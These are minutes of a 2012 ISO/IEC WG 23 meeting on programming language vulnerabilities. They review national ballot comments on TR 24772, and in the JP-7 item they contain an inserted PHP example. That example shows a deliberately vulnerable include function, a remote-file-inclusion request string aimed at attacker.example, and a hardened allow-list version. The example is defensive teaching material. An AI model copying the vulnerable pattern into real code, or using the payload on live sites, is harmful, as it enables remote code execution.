ISO/IEC JTC 1/SC 22/WG 23/N 0420
Minutes: Meeting #23
ISO/IEC JTC 1/SC 22/WG 23: Programming Language Vulnerabilities
12-14 September 2012


These minutes are not final until approved at a subsequent meeting.

Meeting Times:

12 September 2012: 09:00 am to 4:30 pm (Central European Time)
13 September 2012: 09:00 am to 4:30 pm (CET)
14 September 2012: 09:00 am to 12:00 pm (CET)

Meeting Location:

N 0374

Teleconference information:

Topic: WG 23 Meeting #23
Date: Daily, from Wednesday 12 September 2012 to Friday 14 September 2012
Time:
9:00 am Germany
8:00 am United Kingdom
3:00 am New York
12:00 am California
9:00 pm (previous day), Hawaii
Meeting Number: 950 652 945
Meeting Password: wg23

To start or join the online meeting, go to iso_meetings

To receive a call back, provide your phone number when you join the meeting, or call the number below and enter the access code.

Switzerland toll free: 0800-894627
USA/Canada toll free: 1-855-299-5224

Having trouble dialing in? Try these backup numbers:
Call-in toll-free number (UK): 0800-051-3810
Call-in toll number (UK): +44-20-310-64804
Global call-in numbers: iso_meetings call-in numbers
Toll-free dialing restrictions: tollfree restrictions

Access code: 957 751 512
For assistance:

1. Go to iso_meetings support
2. On the left navigation bar, click "Support".
To add this meeting to your calendar program (for example Microsoft Outlook), click this link: iso_meetings to calendar

Agenda

1. Opening activities

1.1 Opening Comments

1.2 Introduction of Participants/Roll Call

1.3 Procedures for this Meeting

The convener noted that this is the first time the committee has worked without its secretary and web master, James Moore. Procedures will be adjusted as the meeting progresses.

1.4 Approval of previous Minutes

1.5 Review of actions items and resolutions, Action Item and Decision Logs

1.6 Approval of Agenda [N0414]

1.7 Information on Future Meetings

1.7.1 Future Meeting Schedule

Meeting    Date            Location               Notes
2013
WG23 #28   2013-12         Electronic meeting
WG23 #27   2013-09         Tokyo, Japan           Colocated with the SC 22 plenary meeting.
WG23 #26   2013-06         Berlin, DE             Colocated with WG 9 / Ada-Europe.
WG23 #25   2013-03-13/15   New York, USA (ANSI)   See [N0413].
2012
WG23 #24   2012-12-12/14   Electronic meeting     Three hours each day, starting at 17:00 Germany; 16:00 UK; 11:00 US east coast; 08:00 US west coast; 06:00 US Hawaii.

1.7.2 Future Agenda Items

None

2. Reports on Liaison Activities

2.1 SC 22

2.2 PL22.3/WG5 (Fortran)

2.3 PL22.4/WG4 (COBOL)

None

2.4 WG9 (Ada)

2.5 PL22.11/WG14 (C)

2.6 PL22.16/WG21 (C++)

None

2.7 Ecma International, TC49/TG2 (C#)

None

2.8 Ecma International, TC39 (ECMAScript)

2.9 MISRA (C)

2.10 MISRA (C++)

None

2.11 SPARK

None

2.12 SC7/WG19 (UML)

None

2.13 Other Liaison Activities or National body reports

3. Document Review

1. [N0416] – Informal comments from UK

Larry Wagoner's comments [N0423] on the Python annex respond to the UK comments [N0416]; the comment concerned is line 50 of the UK contribution.
Status: open, to be discussed with the UK technical expert and the original Python annex author.

2. [N0417] – Japan Ballot comments on 24772

JP-5 (file download) was discussed, including the option of merging it with 7.10 Unrestricted file upload. Concern was expressed about the size of the changes and the amount of material that would be added to TR 24772.

Comments from Willem.

JP-6 Incorrect authorization: needs to be added.
Larry may be able to merge it into 7.21 Access control.
JP-7 Inclusion of functionality from untrusted control sphere:
Suggest merging with 7.7 Execution or loading of untrusted code.
David notes that PHP (and possibly other web-oriented languages) can include code from other domains, so this may also need a description in section 6.

AI 23-4: David to distribute information on the PHP include issue for education and consideration.
JP-8 Improper restriction of excessive authentication attempts: should be added.
Larry states that it could be added to 7.22, but that may be a stretch.
The editor points out that this would require a rewrite of 7.22.
JP-9 URL redirection to untrusted site (open redirect):
Suggest adding as a new vulnerability.
JP-10 Uncontrolled format string:
Suggested that this is a language issue and belongs in section 6.
JP-11 Use of a one-way hash without a salt:
Suggested that this belongs in 7.22. The title of 7.22 may need changing.
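The PHP include behaviour David raised under JP-7, shown as an added example (not code from the minutes or from TR 24772): the vulnerable pattern next to a hardened form. The request parameter, template names and the allow-list are assumptions for illustration.

```php
<?php
// Added example for JP-7 (inclusion of functionality from an untrusted control
// sphere). Not from TR 24772; the template names and ALLOWED_PAGES are assumed.

// Vulnerable form: the include target is built straight from the request.
// With allow_url_include=On (which also requires allow_url_fopen=On), a request
//   ?page=http://attacker.example/evil.txt%00   (or simply .../evil)
// makes PHP fetch and execute code from another domain (remote file inclusion).
// Even with allow_url_include=Off, "../" sequences still let the request select
// any readable local file (local file inclusion).
function render_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// Hardened form: map the untrusted name onto a fixed allow-list of local
// templates and refuse anything else, so no part of the request reaches include().
const ALLOWED_PAGES = [
    'home'    => __DIR__ . '/templates/home.php',
    'about'   => __DIR__ . '/templates/about.php',
    'contact' => __DIR__ . '/templates/contact.php',
];

// Returns the template path for a known page name, or null for anything else.
function resolve_page(string $page): ?string
{
    return ALLOWED_PAGES[$page] ?? null;
}

function render_page_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Usage: the query parameter is untrusted input.
render_page_hardened($_GET['page'] ?? 'home');
```

A practitioner auditing a deployment would also check the interpreter configuration, since the remote variant depends on it: `php -i | grep -i allow_url` should report `allow_url_include => Off`. The allow-list is still required, because the local-file variant is independent of that setting.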

The editor suggests that we accept the comments, put the editorial ones into the TR and work on adding the other comments into the next revision.

The general consensus of the committee is that this is good work and a needed addition to the TR, but that it needs more review. A sub-group of Takebe, Pygott and Benito was formed to get this work ready for inclusion in the 3rd edition of the TR.

3. [N0418] – Canadian Ballot comments on 24772

Resolutions are documented in the [N0421].

4. [N0419] – Takebe, CWE/SANS Top 25 compared to PDTR 24772.2

5. [N0420] – Reserved for minutes

6. [N0421] – Reserved for ballot resolutions

7. [N0422] – Comments from Clive Pygott regarding [N0417]

4. Other Business

4.1 Temporary web site

For the duration of the meeting we shall use the temporary web site set up at www.open-std.org/jtc1/sc22/wg23.

Thanks to Keld Simonsen and Willem Wakker for providing this facility.

Following the link from the SC 22 page on www.open-std.org/jtc1/sc22 still takes you to the usual IEEE web page.

4.2 Code Signing IS 17960

The current proposed draft (still in the author's hands) is fairly prescriptive in terms of file formats, etc. Concern was expressed that application developers will not adopt such an approach. It was suggested that the actual interface be implementation-defined, meaning that it must be documented.

4.3 Promotion of WG23 Products, Steve Michell, per Action Item #21-6

Promotion by speaking at events such as Ada-Europe and a Ruby conference.
Presentation to functional safety and security experts (Japan).

Idea to ask CWE to put a reference to our document on the related efforts.

AI 23-5: John Benito to contact CWE to discuss inclusion of TR 24772 in the related-efforts pages of CWE, CVE, etc.

5. Resolutions

The editor is to incorporate the changes into the document and the disposition of comments, and to submit it to ITTF for a 3-month DTR ballot.
Thanks to IEC, and to Gabriel Barta and Jennifer Lack, for their help in arranging and supporting the meeting.

6. Adjournment